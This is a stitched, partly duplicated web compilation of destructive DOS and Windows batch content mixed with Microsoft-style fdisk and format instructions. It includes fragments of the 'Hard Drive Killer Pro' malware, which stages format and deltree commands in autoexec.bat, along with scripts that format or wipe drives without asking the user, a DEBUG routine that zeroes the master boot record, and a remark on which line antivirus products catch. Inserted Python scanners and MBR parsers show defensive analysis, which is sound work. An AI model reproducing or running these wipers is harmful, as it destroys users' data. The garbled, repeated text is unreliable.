rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
:end
I was told this is the part of the code that AV Companies catch:
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
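A static check in the spirit of the signature line quoted above, as an added example that is not part of the original page: it scans batch-file text for the destructive constructs that appear in the scripts in this section (unattended format, piped confirmation, deltree /y, recursive quiet del, writes to autoexec.bat) and grades the file. The rule names, weights, thresholds and sample scripts are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    weight: int


# (rule name, weight, pattern) -- names and weights are illustrative assumptions.
# Patterns run against lower-cased, whitespace-collapsed lines.
RULES = [
    ("format-autotest", 5, re.compile(r"\bformat\b[^|&]*?/autotest\b")),
    ("format-piped-yes", 5, re.compile(r"\becho\s+y\s*\|\s*format\b")),
    ("deltree-unprompted", 4, re.compile(r"\bdeltree\s+/y\b")),
    ("del-recursive-quiet", 4, re.compile(r"\bdel\b(?=[^|&]*/s\b)(?=[^|&]*/q\b)")),
    ("autoexec-write", 2, re.compile(r">\s*c:\\autoexec\.bat\b")),
    ("autoexec-hide", 2, re.compile(r"\battrib\b[^|&]*\+h[^|&]*autoexec\.bat\b")),
]


def normalize(line):
    """Lower-case, collapse whitespace and drop the leading '@' echo suppressor."""
    return re.sub(r"\s+", " ", line.strip().lower()).lstrip("@")


def is_comment(line):
    """rem and :: lines never execute, so they must not raise findings."""
    return line == "rem" or line.startswith("rem ") or line.startswith("::")


def scan(text):
    """Return one Finding per (line, rule) hit, in file order."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = normalize(raw)
        if not line or is_comment(line):
            continue
        # 'echo ... >>file' lines are scanned too: they stage a payload for later.
        for name, weight, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(line_no, name, weight))
    return findings


def score(findings):
    """Sum weights once per distinct rule so repeated lines do not inflate it."""
    return sum({f.rule: f.weight for f in findings}.values())


def verdict(text):
    total = score(scan(text))
    if total >= 5:
        return "destructive"
    return "review" if total > 0 else "clean"


# Constructed sample: the staging pattern quoted on this page.
SAMPLE_STAGED_FORMAT = "\n".join([
    r"@echo off",
    r"rem deltree /y is only mentioned in this comment",
    r"call attrib -r -h c:\autoexec.bat >nul",
    r"echo call format c: /q /u /autotest >nul >>c:\autoexec.bat",
    r"call attrib +r +h c:\autoexec.bat >nul",
])

# Constructed sample: ordinary administration that touches the same file.
SAMPLE_ADMIN = "\n".join([
    r"@echo off",
    r"echo set PATH=c:\tools;%PATH% >>c:\autoexec.bat",
    r"format a: /q",
])

if __name__ == "__main__":
    for name, text in (("staged", SAMPLE_STAGED_FORMAT), ("admin", SAMPLE_ADMIN)):
        print(name, verdict(text), [(f.line_no, f.rule) for f in scan(text)])
```

Keyword rules like these are a triage aid for file shares and mail attachments, not a replacement for an antivirus engine.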
Do not use this in a batch file
Code:
echo off
cls
echo y|format C:
This will format the Hard Drive Without user permission.
This will go right to do a format. You cannot stop it. (Do not say you were not warned...)
There is a command-line switch to not prompt for y, sorry but can't remember what it is. The above will work.
more parameters follow
FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]
FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]
/V[:label] Specifies the volume label.
/Q Performs a quick format.
/F:size Specifies the size of the floppy disk to format (such as 160, 180, 320, 360, 720, 1.2, 1.44, 2.88).
/B Allocates space on the formatted disk for system files.
/S Copies system files to the formatted disk.
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
/1 Formats a single side of a floppy disk.
/4 Formats a 5.25-inch 360K floppy disk in a high-density drive.
/8 Formats eight sectors per track.
/C Tests clusters that are currently marked "bad."
=======================================================================
C:
Format a HDD with Notepad
You can now do a lot of things with a notepad which you could have never imagined. I will show you how to format a HDD using a notepad.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
OR
If you think you cannot format the C drive while Windows is running, here are some more so you can test on other drives. This is simple binary code.
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your drive d:\
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Do not try it on your PC. Don’t mess around this is for educational purpose only
1. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a.bat file
========================================
D:
CAUTION: This debug script is for advanced users only. Its Purpose is to remove all formatting and partitioning information from your hard disk when FDISK is unable to do so. THIS WILL REMOVE ALL DATA AND PROGRAMS FROM THE DRIVE.
1. Create an MS-DOS boot disk with Debug
2. At DOS command prompt type the following: Debug[Enter] (Where enter is to press the enter key once)
NOTE: Type the following bolded text only. You will receive an error if you type anything other than the bold text. The non-bolded text represents what will appear on your screen once you press [Enter] after each command.
-F 200 L1000 0 [Enter]
-A CS:100 [Enter]
xxxx:0100 MOV AX,301 [Enter]
xxxx:0103 MOV BX,200 [Enter]
xxxx:0106 MOV CX,1 [Enter]
xxxx:0109 MOV DX,80 [Enter]
NOTE: ( --- "80" for hd0, "81" for hd1)
xxxx:010c INT 13 [Enter]
xxxx: 010e INT 20 [Enter]
xxxx: 0110 [Enter]
-G [Enter]
"Program terminated normally"
3. Turn off the computer. On the next startup the hard drive will need to be partitioned and formatted.
***
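The DEBUG script above writes one zero-filled sector over the first sector of the disk, which holds the master boot record and the partition table that Fdisk displays. As an added example (not part of the original page), the following parser reads a 512-byte sector-0 image and reports whether it is blank, whether the boot signature survives, and which partitions it defines; the sample images are constructed, and the 1024 x 255 x 63 geometry used for the INT 13h limit is an assumption.

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446            # four 16-byte partition entries start here
SIGNATURE = b"\x55\xaa"       # boot signature in the last two bytes
# Sectors reachable through plain INT 13h CHS calls, assuming the common
# 1024 x 255 x 63 translated geometry (about 8.4 GB at 512 bytes/sector).
CHS_MAX_SECTORS = 1024 * 255 * 63
SECTORS_PER_MBYTE = 1048576 // SECTOR_SIZE

PARTITION_TYPES = {
    0x01: "FAT12", 0x04: "FAT16 (<32 MB)", 0x05: "EXT DOS",
    0x06: "FAT16", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)", 0x0F: "EXT DOS (LBA)",
}
ENTRY = "<B3sB3sII"           # status, CHS first, type, CHS last, LBA start, count


def parse_mbr(sector):
    """Decode sector 0 into its state flags and the defined partitions."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR image is exactly 512 bytes")
    partitions = []
    for slot in range(4):
        offset = TABLE_OFFSET + 16 * slot
        status, _first, ptype, _last, lba_start, count = struct.unpack_from(
            ENTRY, sector, offset)
        if ptype == 0:        # unused table slot
            continue
        partitions.append({
            "slot": slot + 1,
            "active": status == 0x80,
            "type": PARTITION_TYPES.get(ptype, "type 0x%02X" % ptype),
            "mbytes": count // SECTORS_PER_MBYTE,
            "needs_int13_ext": lba_start + count > CHS_MAX_SECTORS,
        })
    return {
        "all_zero": not any(sector),
        "signature_ok": sector[510:512] == SIGNATURE,
        "partitions": partitions,
    }


def assess(sector):
    """One-line triage verdict for a sector-0 image."""
    info = parse_mbr(sector)
    if info["all_zero"]:
        return "sector 0 is blank: no boot code, no partition table"
    if not info["signature_ok"]:
        return "boot signature missing: partition table is not trustworthy"
    if not info["partitions"]:
        return "valid signature but empty partition table"
    return "%d partition(s) defined" % len(info["partitions"])


def build_sample_mbr(entries):
    """Constructed input: entries are (active, type, lba_start, sector_count)."""
    sector = bytearray(SECTOR_SIZE)
    for slot, (active, ptype, lba_start, count) in enumerate(entries):
        struct.pack_into(ENTRY, sector, TABLE_OFFSET + 16 * slot,
                         0x80 if active else 0x00, b"\0\0\0", ptype,
                         b"\0\0\0", lba_start, count)
    sector[510:512] = SIGNATURE
    return bytes(sector)


# Constructed layout: a 1200-Mbyte active FAT16 primary followed by a
# 1200-Mbyte extended partition.
SAMPLE = build_sample_mbr([
    (True, 0x06, 63, 1200 * SECTORS_PER_MBYTE),
    (False, 0x05, 63 + 1200 * SECTORS_PER_MBYTE, 1200 * SECTORS_PER_MBYTE),
])
# What sector 0 looks like after a single all-zero sector has been written to it.
WIPED = bytes(SECTOR_SIZE)

if __name__ == "__main__":
    for label, image in (("sample", SAMPLE), ("wiped", WIPED)):
        print(label, "->", assess(image))
        for part in parse_mbr(image)["partitions"]:
            print("   ", part)
```

On a real system, take the image from a forensic copy of the disk rather than the live device; only sector 0 is affected, so the volumes' own boot sectors and data can still be located by a recovery tool.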
====================================================================================
E :
How to Format a Hard Disk
After you create the partitions, you must format the partitions:
1. Restart your computer with the Startup disk in the floppy disk drive.
NOTE: If you are using a Windows 95 Startup disk, a command prompt is displayed and you can skip to step 2. If you are using a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk, select the Start computer without CD-ROM support menu option when the Windows 98 Startup menu is displayed.
2. When a command prompt is displayed, type format c: /s, and then press ENTER. This command transfers the system files and should only be used when you format drive C (or your "active" drive). For all other partitions, type format drive: (where drive is the letter of the partition that you want to format).
NOTE: If you receive a "Bad command" or "Bad file name" error message, you may need to extract the Format.com tool to your boot disk. To do this, type the following command at a command prompt, and then press ENTER:
extract ebd.cab format.com
After the Format.com tool is extracted to your boot disk, type format c: /s at a command prompt to format your active partition, or type format drive: if you want to format a partition that is not your active partition.
3. When you successfully run the Format.com tool, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!
Proceed with Format?
4. Press Y, and then press ENTER to format drive C.
5. After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the drive. You can either type an 11-character name for the drive, or you can leave it blank by pressing ENTER.
For information about how to repartition the extended partition and logical drives, view the "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format a Slave Hard Disk
If you want to add a second hard disk (slave drive) to your computer, you need to make sure that the jumpers on both the master (original) and slave (new drive) are set according to the manufacturer's instructions first so that your computer can detect the hard disks. Verify that your hardware is installed correctly, and then follow these steps:
1. Click Start, point to Run, and then type command (Note that the cmd command only works on Windows 2000-based computers).
2. At a command prompt, type fdisk, and then press ENTER. The following menu is displayed:
   1. Create DOS partition or Logical DOS Drive
   2. Set active partition
   3. Delete partition or Logical DOS Drive
   4. Display partition information
   5. Change current fixed disk drive
Note that menu option 5 is available only if you have two physical hard disks on your computer.
3. Press 5, and then press ENTER. When you do this, the selection changes from the physical disk 1 (master) to the physical disk 2 (slave).
4. Press 1 to select the Create DOS partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Create Extended DOS Partition menu option, and then press ENTER. When you make your slave drive an extended MS-DOS partition, your drive letters do not change. For example, if the first drive contains partition C and partition D, your slave drive becomes D unless you set the slave drive as an extended partition. If you skip this step and just create another primary MS-DOS partition for the slave drive, the new drive becomes drive D and what used to be drive D changes to drive E.
5. You can partition the slave drive to make other logical drives just as you did with the original master drive. If your computer cannot detect the new drive, you may need to add the following line to your Config.sys file, where drive is a letter that is greater than the last drive letter on the computer (including the CD-ROM drive):
lastdrive=drive
6. After you finish using the Fdisk tool, format the new partitions so that you can use them. After you press ESC to quit the Fdisk tool, restart your computer to start Windows.
How to Format a Slave Hard Disk
To format your new partition or partitions, use one of the following methods, depending on your file system. For a FAT16 file system:
a. Double-click My Computer, right-click the partition that you just created, click Format, click Full, and then click Start.
b. After the format procedure is complete, click OK to close the dialog box.
For a FAT32 file system:
a. Click Start, point to Programs, point to Accessories, point to System Tools, click Drive Converter (FAT32), and then click Next.
b. In the Drives box, click the drive that you want to convert to the FAT32 file system.
c. Click Next, and then click OK.
d. Click Next, click Next, and then click Next again.
e. When the conversion procedure is finished, click Finish.
NOTE: Do not use the /s switch that you used when you set up drive C. All you need to do is to format the drive or drives so that you can use them (for example, if you created two new drive letters, you need to format both drives).
For information about how to repartition the extended partition and logical drives, view the following "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk
Use the steps in this section to resize or combine your extended partition and logical drives. Make sure that you have a reliable backup of any important data that you have on your extended partition and logical drives before you proceed. If you want to combine your entire hard disk in one partition, use the steps in the "How to Partition and Format a Master Hard Disk" section in this article.
How to Repartition the Extended Partition and the Logical Drives
NOTE: When you use this method, two or more partitions are left on your hard disk, a primary partition (usually drive C) and an extended partition. Even if you use the FAT32 file system, there is an 8-GB partition limitation unless you obtain a BIOS upgrade that fully supports interrupt 13 extensions. For additional information about why there is an 8-GB limit, click the article number below to view the article in the Microsoft Knowledge Base:
153550 (http://support.microsoft.com/kb/153550/EN-US/ ) Hard Disk Limited to 8-GB Partition
If you have a hard disk that is larger than 8 GB and you are not using a disk overlay program or disk management software, you need to partition and format the space that is remaining after you create each 8-GB partition:
1. Place the Startup disk in your floppy disk drive, restart your computer, and then use one of the following methods, depending on your operating system. For a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk:
a. When the Microsoft Windows 98 Startup menu is displayed, select the Start computer without CD-ROM support menu option, and then press ENTER.
b. At a command prompt, type fdisk, and then press ENTER.
c. Go to step 2.
For a Windows 95 Startup disk:
d. At a command prompt, type fdisk, and then press ENTER.
e. Go to step 2.
If your hard disk is larger than 512 MB, you receive the following message:
Your computer has a disk larger than 512 MB. This version of Windows includes improved support for large disks, resulting in more efficient use of disk space on large drives, and allowing disks over 2 GB to be formatted as a single drive.
IMPORTANT: If you enable large disk support and create any new drives on this disk, you will not be able to access the new drive(s) using other operating systems, including some versions of Windows 95 and Windows NT, as well as earlier versions of Windows and MS-DOS. In addition, disk utilities that were not designated explicitly for the FAT32 file system will not be able to work with this disk. If you need to access this disk with other operating systems or older disk utilities, do not enable large drive support.
Do you wish to enable large disk support (Y/N)?
If you want to use the FAT32 file system, press Y and then press ENTER. If you want to use the FAT16 file system, press N, and then press ENTER. For additional information about the FAT32 and FAT16 file systems, click the article numbers below to view the articles in the Microsoft Knowledge Base:
118335 (http://support.microsoft.com/kb/118335/EN-US/ ) Maximum Partition Size Using FAT16 File System
154997 (http://support.microsoft.com/kb/154997/EN-US/ ) Description of the FAT32 File System
After you press ENTER, the following Fdisk Options menu is displayed:
1. Create DOS partition or Logical DOS Drive
2. Set active partition
3. Delete partition or Logical DOS Drive
4. Display partition information
5. Change current fixed disk drive
(this option is only available if you
have two physical hard disks in the computer)
Press 3, and then press ENTER. The following menu is displayed:
1. Delete Primary DOS Partition
2. Delete Extended DOS Partition
3. Delete Logical DOS Drive(s) in the Extended DOS Partition
4. Delete Non-DOS Partition
Press 3, and then press ENTER.
The Delete Logical DOS Drive(s) in the Extended DOS Partition screen is displayed with a chart that describes the attributes of your hard disk, as shown in the following example.
Drv Volume Label Mbytes System Usage
D: (User Defined) 2047 FAT16 100%
E: (User Defined) 2047 FAT16 100%
F: (User Defined) 2047 FAT16 100%
G: (User Defined) 2047 FAT16 100%
H: (User Defined) 2047 FAT32 17%
I: (User Defined) 1498 UNKNOWN 13%
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes).
WARNING! Data in a deleted Logical DOS Drive will be lost.
What drive do you want to delete? Type the letter for the drive that you want to delete, and then press ENTER.
When you are prompted to type the volume label for the drive, type the volume label if the drive has a volume label.
NOTE: You must type the exact label or press ENTER if there is no volume label. If you type an incorrect label name, you receive the following message:
Volume label does not match.
Enter Volume Label?
If you type the correct volume label, you receive the following message:
Are you sure (Y/N)?
The default answer to this message is N. You must press Y, and then press ENTER to delete the drive. The words "Drive deleted" are displayed in the chart next to the drive letter that you deleted.
Repeat steps 3 through 7 until you have deleted all of the drives that you want to delete. When you are finished, press ESC. If you remove all of the logical drives, you receive a "No logical drives defined" message and a chart of drive letters that you changed or deleted. Press ESC to continue.
NOTE: If you want to resize the logical drive or drives by making them larger or smaller, do this now. If you want to remove the extended partition, view step 11.
Press 1 to select the Create DOS partition or Logical DOS Drive menu option from the Fdisk Options menu, press 3 to select the Create Logical DOS Drive(s) in the Extended DOS Partition menu option from the Create DOS Partition or Logical DOS Drive menu, and then press ENTER. When you do this, you receive a "Verifying drive integrity" message with a percentage-complete counter.
NOTE: When you use this step, the extended partition is not deleted, only the logical drive or drives in the extended partition are deleted. You do not need to remove the extended partition to resize the logical drives. For example, if you have one logical drive in the extended partition and you want to make two logical drives, delete the logical drive and create two logical drives in the extended partition first. Note that you are still limited to the total space in the extended partition.
After the drive verification procedure is finished, you receive the following message:
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes)
Maximum space available for logical drive is XXX Mbytes (X%)
Enter logical drive size in Mbytes or percent of disk space (%).
The "maximum Mbytes available" is the default size; however, you can change the number by typing the partition size that you want to create and then pressing ENTER. Press ESC, press ESC to quit the Fdisk tool and return to a command prompt, and then view step 11.
If you want to remove the extended MS-DOS partition, press ESC to return to the Fdisk Options menu. Press 3 to select the Delete DOS Partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Delete Extended DOS Partition menu option, and then press ENTER.
The screen shows the current fixed disk drive and information about it. The extended partition is listed in the Type column. For example:
Partition  Status  Type     Volume Label  Mbytes  System   Usage
C: 1       A       PRI DOS  (your label)  1200    FAT16    50%
   2               EXT DOS  (your label)  1200    UNKNOWN  50%
Total disk space is 2400 Mbytes (1 Mbyte = 1048576 bytes)
You also receive the following warning message:
WARNING! Data in the deleted Extended DOS Partition will be lost.
Do you wish to continue (Y/N)?
Press Y, and then press ENTER to delete the partition. You receive the following message:
Extended DOS Partition deleted
Press ESC to continue
NOTE: If you try to delete your extended MS-DOS partition before you remove all of the logical drives, you receive the following error message:
Cannot delete Extended DOS Partition while logical drives exist.
If you receive this error message, repeat steps 3 through 6, and then follow steps 9 and 10 to delete the extended MS-DOS partition.
The Fdisk Options menu is displayed. If you leave disk space unpartitioned on your hard disk, Windows may not display the full size of your hard disk, only the amount of space that is available.
IMPORTANT: After you change the Fdisk options or delete partitions, the data that was on the partition is deleted and cannot be retrieved. Be very sure that you understand this procedure before you attempt to follow it. If you want to start with a clean configuration or if you want to redo your current configuration, back up everything that is important to you before you use the Fdisk tool.
If you want to use the unpartitioned space on your hard disk, you must format the drives. When you successfully run the Format.com utility, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE X: WILL BE LOST!
Proceed with Format (Y/N)?
Press Y, and then press ENTER to format the drive.
After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the hard disk. You can either type an 11-character name for the drive, or leave it blank and press ENTER.
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
:end
I was told this is the part of the code that AV Companies catch:
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
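A defender's view of the line quoted above, as an added example that is not code from the original post: a small static scanner that flags the destructive commands shown on this page inside a batch file, and separates commands that run immediately from ones written into a startup file. The rule names, function names and sample script are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken from the commands quoted on this page.
# Rule names are hypothetical labels chosen for this example.
DESTRUCTIVE = {
    "unattended-format": re.compile(r"\bformat\b[^|&]*/autotest\b", re.I),
    "piped-confirm-format": re.compile(r"\becho\s+y\s*\|\s*format\b", re.I),
    "recursive-deltree": re.compile(r"\bdeltree\s+/y\b", re.I),
    "recursive-quiet-del": re.compile(r"\bdel\b(?=[^|&]*/s\b)(?=[^|&]*/q\b)", re.I),
}
# Files run at boot: a command written here fires on the next restart.
STARTUP_FILES = {r"c:\autoexec.bat"}
# Comments, and echo lines with no redirect or pipe, only display text.
INERT = re.compile(r"^\s*@?(?:rem\b|::|echo\b[^>|]*$)", re.I)
# "echo <command> >file" or ">>file": the command is staged into <file>.
ECHO_REDIRECT = re.compile(r"^\s*@?echo\s+.*?>{1,2}\s*([^\s>]+)\s*$", re.I)


@dataclass
class Finding:
    line_no: int
    rules: Tuple[str, ...]
    staged_to: Optional[str]  # target file when the line is an echo-redirect


def scan(script: str) -> List[Finding]:
    """Return one Finding per line that carries a destructive indicator."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        if INERT.match(line):
            continue
        hits = tuple(n for n, rx in DESTRUCTIVE.items() if rx.search(line))
        if not hits:
            continue
        m = ECHO_REDIRECT.match(line)
        target = m.group(1).lower() if m else None
        if target == "nul":  # output discarded, nothing is staged
            target = None
        findings.append(Finding(no, hits, target))
    return findings


def verdict(findings: List[Finding]) -> str:
    """high: destructive command planted in a startup file; medium: any hit."""
    if any(f.staged_to in STARTUP_FILES for f in findings):
        return "high"
    return "medium" if findings else "none"


# Constructed sample built only from command lines quoted on this page.
SAMPLE = r"""@echo off
rem deltree /y is mentioned only in this comment
echo do not run deltree /y by hand
call attrib -r -h c:\autoexec.bat >nul
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo y|format C:
del %systemdrive%\*.*/f/s/q
"""

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f.line_no, f.rules, f.staged_to)
    print("verdict:", verdict(scan(SAMPLE)))
```

The scanner matches literal command text only, so it is a triage aid for scripts found on disk or in mail attachments, not a replacement for an antivirus engine.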
Do not use this in a batch file
Code:
echo off
cls
echo y|format C:
This will format the Hard Drive Without user permission.
This will go right to do a format. You canot stop it. (do not say you were not warned...)
there is a command line switch to not prompt for y, sorry but cant remember what it is. the above will work.
more parameters follow
FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]
FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]
/V[:label] Specifies the volume label.
/Q Performs a quick format.
/F:size Specifies the size of the floppy disk to format (such as 160, 180, 320, 360, 720, 1.2, 1.44, 2.88).
/B Allocates space on the formatted disk for system files.
/S Copies system files to the formatted disk.
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
/1 Formats a single side of a floppy disk.
/4 Formats a 5.25-inch 360K floppy disk in a high-density drive.
/8 Formats eight sectors per track.
/C Tests clusters that are currently marked "bad."
=======================================================================
C:
Format a HDD with Notepad
You can now do a lot of things with a notepad which you could have never imagined. I will show you how to format a HDD using a notepad.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
OR
IF u think u cannot format c driver when windows..any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Do not try it on your PC. Don’t mess around this is for educational purpose only
1. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a.bat file
========================================
D:
CAUTION: This debug script is for advanced users only. Its Purpose is to remove all formatting and partitioning information from your hard disk when FDISK is unable to do so. THIS WILL REMOVE ALL DATA AND PROGRAMS FROM THE DRIVE.
1. Create an MS-DOS boot disk with Debug
2. At DOS command prompt type the following: Debug[Enter] (Where enter is to press the enter key once)
NOTE: Type the following bolded text only. You will receive an error if you type anything other than the bold text. The non-bolded text represents what will appear on your screen once you press [Enter] after each command.
-F 200 L1000 0 [Enter]
-A CS:100 [Enter]
xxxx:0100 MOV AX,301 [Enter]
xxxx:0103 MOV BX,200 [Enter]
xxxx:0106 MOV CX,1 [Enter]
xxxx:0109 MOV DX,80 [Enter]
NOTE: ( --- "80" for hd0, "81" for hd1)
xxxx:010c INT 13 [Enter]
xxxx: 010e INT 20 [Enter]
xxxx: 0110 [Enter]
-G [Enter]
"Program terminated normally"
3. Turn off the computer. On the next startup the hard drive will need to be partitioned and formatted.
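For triage after a procedure like the one above, an added example (not part of the original page) that parses an image of a disk's first sector and reports whether the partition table is intact, empty or zeroed. The function names and the sample sector, built to mirror the 1200-MB primary and extended partitions in the Fdisk example later on this page, are constructed for illustration.

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446          # four 16-byte partition entries start here
SIGNATURE = b"\x55\xaa"     # boot signature stored at bytes 510-511
TYPE_NAMES = {
    0x01: "FAT12", 0x04: "FAT16 <32M", 0x05: "Extended", 0x06: "FAT16",
    0x0B: "FAT32", 0x0C: "FAT32 (LBA)", 0x0E: "FAT16 (LBA)",
    0x0F: "Extended (LBA)",
}


def parse_mbr(sector: bytes) -> dict:
    """Classify a first-sector image and list its partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly 512 bytes")
    entries = []
    for i in range(4):
        # boot flag, 3 CHS bytes, type, 3 CHS bytes, start LBA, sector count
        flag, ptype, lba_start, count = struct.unpack_from(
            "<B3xB3xII", sector, TABLE_OFFSET + 16 * i)
        if ptype == 0:      # type 0 marks an unused slot
            continue
        entries.append({
            "slot": i + 1,
            "active": flag == 0x80,
            "type": TYPE_NAMES.get(ptype, "0x%02X" % ptype),
            "lba_start": lba_start,
            "mbytes": count * SECTOR_SIZE // 1048576,
        })
    if not any(sector):
        state = "zeroed"              # every byte is 0: no table, no boot code
    elif sector[510:512] != SIGNATURE:
        state = "invalid-signature"
    elif not entries:
        state = "empty-table"
    else:
        state = "ok"
    return {"state": state, "entries": entries}


def build_sample_mbr() -> bytes:
    """Constructed sector: active FAT16 primary plus an extended partition."""
    sectors_1200mb = 1200 * 1048576 // SECTOR_SIZE
    sector = bytearray(SECTOR_SIZE)
    sector[446:462] = struct.pack("<B3sB3sII", 0x80, b"\0" * 3, 0x06,
                                  b"\0" * 3, 63, sectors_1200mb)
    sector[462:478] = struct.pack("<B3sB3sII", 0x00, b"\0" * 3, 0x05,
                                  b"\0" * 3, 63 + sectors_1200mb,
                                  sectors_1200mb)
    sector[510:512] = SIGNATURE
    return bytes(sector)


if __name__ == "__main__":
    print(parse_mbr(build_sample_mbr()))
    print(parse_mbr(bytes(SECTOR_SIZE))["state"])
```

Run it against a sector image taken from a forensic copy rather than the live disk, so the evidence is not modified.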
***
====================================================================================
E :
How to Format a Hard Disk
After you create the partitions, you must format the partitions:
1. Restart your computer with the Startup disk in the floppy disk drive.
